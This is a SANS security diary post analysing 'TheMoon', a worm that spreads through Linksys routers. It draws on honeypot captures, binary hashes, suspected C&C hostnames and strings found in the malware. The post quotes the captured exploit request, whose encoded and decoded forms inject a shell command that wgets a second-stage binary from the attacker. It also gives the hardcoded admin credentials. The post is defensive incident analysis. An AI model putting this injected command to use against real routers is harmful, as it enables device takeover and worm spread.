InfoSec Handlers Diary Blog

Linksys Worm ("TheMoon") Captured

Published: 2014-02-13
Last Updated: 2014-02-13 18:06:36 UTC
by Johannes Ullrich (Version: 1)

Assistance needed:

If you have a vulnerable device that is infected, we could use full packet captures from that device. I am still trying to find out more about the command and control channel (if it exists).
if you have experience reverse engineering MIPS malware, ask me for a sample (use the contact form.)

One important update: This affects other Linksys routers as well. For example, we do have some routers conecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4)

Finally our honeypot did capture something that looks like it is responsible for the scanning activity we see:

The initial request, as discussed earlier, is:

GET /HNAP1/ HTTP/1.1

Host: [ip of host]:8080

The next request is where it gets interesting:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH    <- username: admin   password: &i1*@U$6xvcG 
   (still trying to figure out the significance of this password)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63
%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f
%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74
%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63
%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20
%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e
%xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69
%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31

The decoded version of this request:


submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1

So it looks like it will try to download a "second stage" from port 193 from the attacking router. The ".L26" file appears to be a lock file to prevent multiple exploitation.

I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.

The port appears to change but is always < 1024. The second stage binary si always three letters and then a "random" extension.

Here are the MD5s of some of the binaries I retrieved so far. They are ELF binaries . If anybody would like to assist in reversing them, please contact me for a sample.

d9547024ace9d91037cbeee5161df33e 0dQ.png
a85e4a90a7b303155477ee1697995a43 Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e Osn.asc

file type: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

I am going to update this diary a bit blow-by-blow like as I am getting to reverse parts of the second stage.

- The binary includes a set of hard coded netblocks (/24 and /21) which are likely the blocks it scans.

- there are also hardcoded dyndyn.org host names. Not sure yet what they are for (C&C?): azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com and more.

- just based on "strings" still, it looks like there is a command and control channel use to report back the status of the host.

- a list of user agents:

Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)

Mozilla/2.0 (compatible; MSIE 3.0B; Win32)

Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)

Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.0.3705)

Mozilla/4.0 (compatible; MSIE 6.0; Win32) WebWasher 3.0

Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]

Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.4.14-xfs; X11; i686)

Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9

Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/xxx.x (KHTML like Gecko) Safari/12x.x

Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7

Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1

Opera/9.0 (Windows NT 5.1; U; en)

Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686; U;) Gecko/20011224

Opera/6.x (Linux 2.4.8-26mdk i686; U) [en]

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3

Mozilla/5.0 (X11; Linux i686; U;rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1

- a list of server banners:

Apache/2.2.9 (Fedora)

Apache/1.3.3 (Unix) (Red Hat/Linux)

Apache/1.3.23

Microsoft-IIS/5.0

nginx

Microsoft-IIS/5.1

Netscape-Enterprise/4.1

Microsoft-IIS/6.0

Apache/2.2.24 (Amazon)

Sun-ONE-Web-Server/6.1

Microsoft-IIS/7.5

IBM_HTTP_Server

Extensions and media types used for the 2nd stage files:

application/pdf

.pdf

image/png

image/gif

.gif

image/jpeg

.jpg

image/bmp

.bmp

image/tiff

.tif

audio/ac3

.ac3

audio/asc

.asc

audio/ogg

.ogg

audio/midi

.mid

audio/mpeg

.mpg

video/mpeg

video/avi

.avi

video/raw

.raw

The binary is linked against OpenSSL, so the C&C channel could use SSL.

The binary also includes a couple of images (thanks Peter for pointing that out). The creation date of the images is May 9th 2013. They appear to be logos identifying the author? There are a total of 5 PNG images. 3 smilies and 2 logos. I am including the larger logo below. There are a number of strings with references to "lunar", "moon", "planets" that appear to be used as part of the C&C channel.

The reference to "Lunar Industries" and the logo appears to be a reference to the movie "The Moon" http://www.imdb.com/title/tt1182345/

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: exploit linksys scanning

18 comment(s)

Join us at SANS! Attend Defending Web Applications Security Essentials with Johannes Ullrich in San Francisco starting Dec 02 2019